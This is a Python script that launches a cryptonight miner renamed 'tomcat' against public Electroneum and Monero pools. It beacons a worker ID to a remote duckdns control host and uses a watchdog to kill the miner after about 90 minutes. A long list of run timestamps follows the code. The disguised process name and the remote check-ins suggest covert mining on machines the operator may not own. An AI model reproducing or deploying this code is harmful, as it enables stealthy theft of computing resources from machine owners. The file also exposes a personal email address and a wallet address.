import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:05.244416
#2018-02-17 15:55:01.490346
#2018-02-17 17:43:07.733613
#2018-02-17 19:32:03.902487
#2018-02-17 21:21:01.342882
#2018-02-17 23:05:01.874618
#2018-02-18 00:52:01.750592
#2018-02-18 02:40:01.730649
#2018-02-18 04:28:04.511201
#2018-02-18 06:18:07.816668
#2018-02-18 08:08:05.549133
#2018-02-18 09:55:05.699150
#2018-02-18 11:42:05.195885
#2018-02-18 13:27:06.133527
#2018-02-18 15:17:05.047679
#2018-02-18 17:06:07.371194
#2018-02-18 18:53:01.556022
#2018-02-18 20:41:03.482019
#2018-02-18 22:26:07.548203
#2018-02-19 00:15:08.466760
#2018-02-19 02:01:07.986813
#2018-02-19 03:49:05.487667
#2018-02-19 05:34:05.593287
#2018-02-19 07:22:08.404293
#2018-02-19 09:12:07.542640
#2018-02-19 11:02:08.338847
#2018-02-19 12:50:08.487763
#2018-02-19 14:38:05.206633
#2018-02-19 16:25:11.331708
#2018-02-19 18:11:04.061013
#2018-02-19 19:58:07.855339
#2018-02-19 21:47:01.471785
#2018-02-19 23:33:06.577337
#2018-02-20 01:19:01.489145
#2018-02-20 03:09:05.604887
#2018-02-20 04:57:01.952338
#2018-02-20 06:39:03.599207
#2018-02-20 08:24:02.001180
#2018-02-20 10:10:06.668107
#2018-02-20 11:55:02.073969
#2018-02-20 13:42:02.194414
#2018-02-20 15:25:07.578478
#2018-02-20 17:12:08.166728
#2018-02-20 19:02:02.043542
#2018-02-20 20:52:06.031376
#2018-02-20 22:37:08.479862
#2018-02-21 00:19:09.165804
#2018-02-21 02:06:03.749384
#2018-02-21 03:53:05.866737
#2018-02-21 05:40:09.575375
#2018-02-21 07:29:01.600664
#2018-02-21 09:13:03.876818
#2018-02-21 11:02:02.089092
#2018-02-21 12:50:08.108789
#2018-02-21 14:39:01.437216
#2018-02-21 16:28:02.188587
#2018-02-21 18:19:10.507576
#2018-02-21 20:06:08.655003
#2018-02-21 21:53:02.219419
#2018-02-21 23:39:07.318742
#2018-02-22 01:28:04.276769
#2018-02-22 03:17:05.767875
#2018-02-22 05:06:07.836814
#2018-02-22 06:49:06.355945
#2018-02-22 08:38:05.567691
#2018-02-22 10:25:01.611275
#2018-02-22 12:11:04.679430
#2018-02-22 13:56:06.299426
#2018-02-22 15:44:04.497901
#2018-02-22 17:31:04.343776
#2018-02-22 19:19:03.832906
#2018-02-22 21:12:02.042060
#2018-02-22 22:56:07.959603
#2018-02-23 00:44:09.694463
#2018-02-23 02:34:08.320148
#2018-02-23 04:23:07.633765
#2018-02-23 06:10:09.455851
#2018-02-23 07:57:02.146590
#2018-02-23 10:15:08.524767
#2018-02-23 12:09:01.679161
#2018-02-23 13:56:01.281053
#2018-02-23 15:47:10.736248
#2018-02-23 17:33:01.809187
#2018-02-23 19:21:08.595485
#2018-02-23 21:04:01.536686
#2018-02-23 22:49:01.939131
#2018-02-24 00:37:06.663533
#2018-02-24 02:27:06.342894
#2018-02-24 04:18:03.417118
#2018-02-24 06:05:09.339575
#2018-02-24 07:54:05.871319
#2018-02-24 09:38:05.264483
#2018-02-24 11:33:04.317599
#2018-02-24 13:23:04.318434
#2018-02-24 15:12:04.351273
#2018-02-24 17:01:01.694649
#2018-02-24 18:48:05.553863
#2018-02-24 20:39:07.705516
#2018-02-24 22:47:04.031134
#2018-02-25 02:08:05.976992
#2018-02-25 05:33:04.753718
#2018-02-25 11:34:01.782458